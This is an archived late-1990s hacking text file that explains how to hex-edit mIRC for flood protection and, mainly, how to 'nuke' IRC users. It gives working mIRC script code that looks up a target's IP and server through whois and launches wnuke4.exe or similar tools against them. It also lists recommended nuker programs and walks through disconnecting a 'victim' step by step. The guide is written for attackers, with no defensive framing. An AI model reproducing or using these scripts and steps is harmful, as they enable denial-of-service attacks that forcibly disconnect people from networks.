home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / internet / hexedit.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  2.8 KB  |  95 lines

  1. How to Hexedit mIRC - Flood Protection/Nuking
  2.  
  3. Flood Protection 
  4. 1.Get Rid of Version/User Floods 
  5.   Using a hex editor open mIRC.exe. 
  6.   Search for Reply. 
  7.   Find where the replies are. 
  8.   Simply delete all the replys, except for the ping reply. 
  9.  
  10.  
  11. How to Nuke
  12.  
  13. There are several ways and versions of nukes but the most common is the simple wnuke nuke. 
  14. It just disconnects the user from the server, so that's what a connection reset by peer 
  15. means! I'll cover the wnukes first then the other types of nukes
  16.  
  17. The 2 types of WNukes 
  18. 1.WNUKE 4 From a Popup Nuke 
  19.   Download WNUKE4.EXE 
  20.   Add these pieces of coding to the appropriate portions of mIRC. 
  21.  
  22.         [POPUPS/NICK NAMES LIST]
  23.         NUKE!:/mn $1 $2 $3 $4 $5 $6 $7
  24.  
  25.         [ALIASES]
  26.         mn {
  27.         .nuke $$1 
  28.         timer 1 3 /nuke $$2 
  29.         timer 1 6 /nuke $$3 
  30.         timer 1 9 /nuke $$4 
  31.         timer 1 12 /nuke $$5 
  32.         timer 1 15 /nuke $$6 
  33.         timer 1 18 /nuke $$7 
  34.         }
  35.         /nuke {
  36.         enable #nuke
  37.         set %nuke.nick $1
  38.         stats L $1
  39.         whois $1
  40.         timer 1 2 /src
  41.         }
  42.         [RAW]
  43.         #nuke disabled
  44.         311:*: set %nukeip $parm4 | halt
  45.         312:*: set %nukeserver $parm3 | halt
  46.         301:*: halt
  47.         313:*: halt
  48.         319:*: halt
  49.         317:*: halt
  50.         318:*: run $mircdir $+ \wnuke4.exe -n %nukeserver %nukeip 0 1200-3500 %nukeport | .disable #nuke | echo 6 Nuking %nukeip on %nukeserver %nukeport $+ . | halt
  51.         #nuke end
  52.                         
  53.  
  54. 2.WNewk Via a Seperate Program 
  55.  
  56. 1.Pick Your Weapon 
  57.   1.wnuke.exe 
  58.   2.wnuke2.exe 
  59.   3.wnuke4.exe RECOMMENDED 
  60.   4.dccnewk.exe 
  61.   5.pnewq97o.exe 
  62.   6.snuke.exe 
  63.   7.wnewk.exe 
  64.   8.wnewk-x.exe 
  65.   9.wnewk-x2.exe RECOMMENDED 
  66.  
  67. 2.The below options refer to a bit of code and here it is:
  68.  
  69.       [POPUPS/NICKNAMES LIST]
  70.        Nuke
  71.        .DNS:/dns *1
  72.        .Run Nuker:/run $mircdir $+ utils\nukers\wnewk-x2.exe
  73.        .Whois:/whois *1
  74.                       
  75.  
  76.       This is based on the fact your nuker is in a sub-dir of utils called nukers. 
  77. 3.Run Your weapon of choice in this case wnewk-x2.exe or of course increase your 
  78.   script by adding in the bit of code. 
  79.  
  80. 4.Now do a /dns on the enemy or you could add the bit of code to your script. 
  81.  
  82. 5.Now do a /whois on the enemy or you could add the bit of code to your script. 
  83.  
  84. 6.Look in your status window, highlight the outputted ip address and server
  85.   of your victim and hit crtl+c(seperate copy for each, these are placed in the config more 
  86.   info in next step). 
  87.  
  88. 7.Configure the script: 
  89.   Server: paste the server from the status window here 
  90.   Destination address: paste the ip of the victim from the status window here. 
  91.  
  92.   Hit engage newk and watch in the channel for a:CONNECTION RESET BY PEER 
  93.   If it dosen't work increase the rang of ports, do a /links and pick a different 
  94.   server to try going through, or try a different unreach to use. 
  95.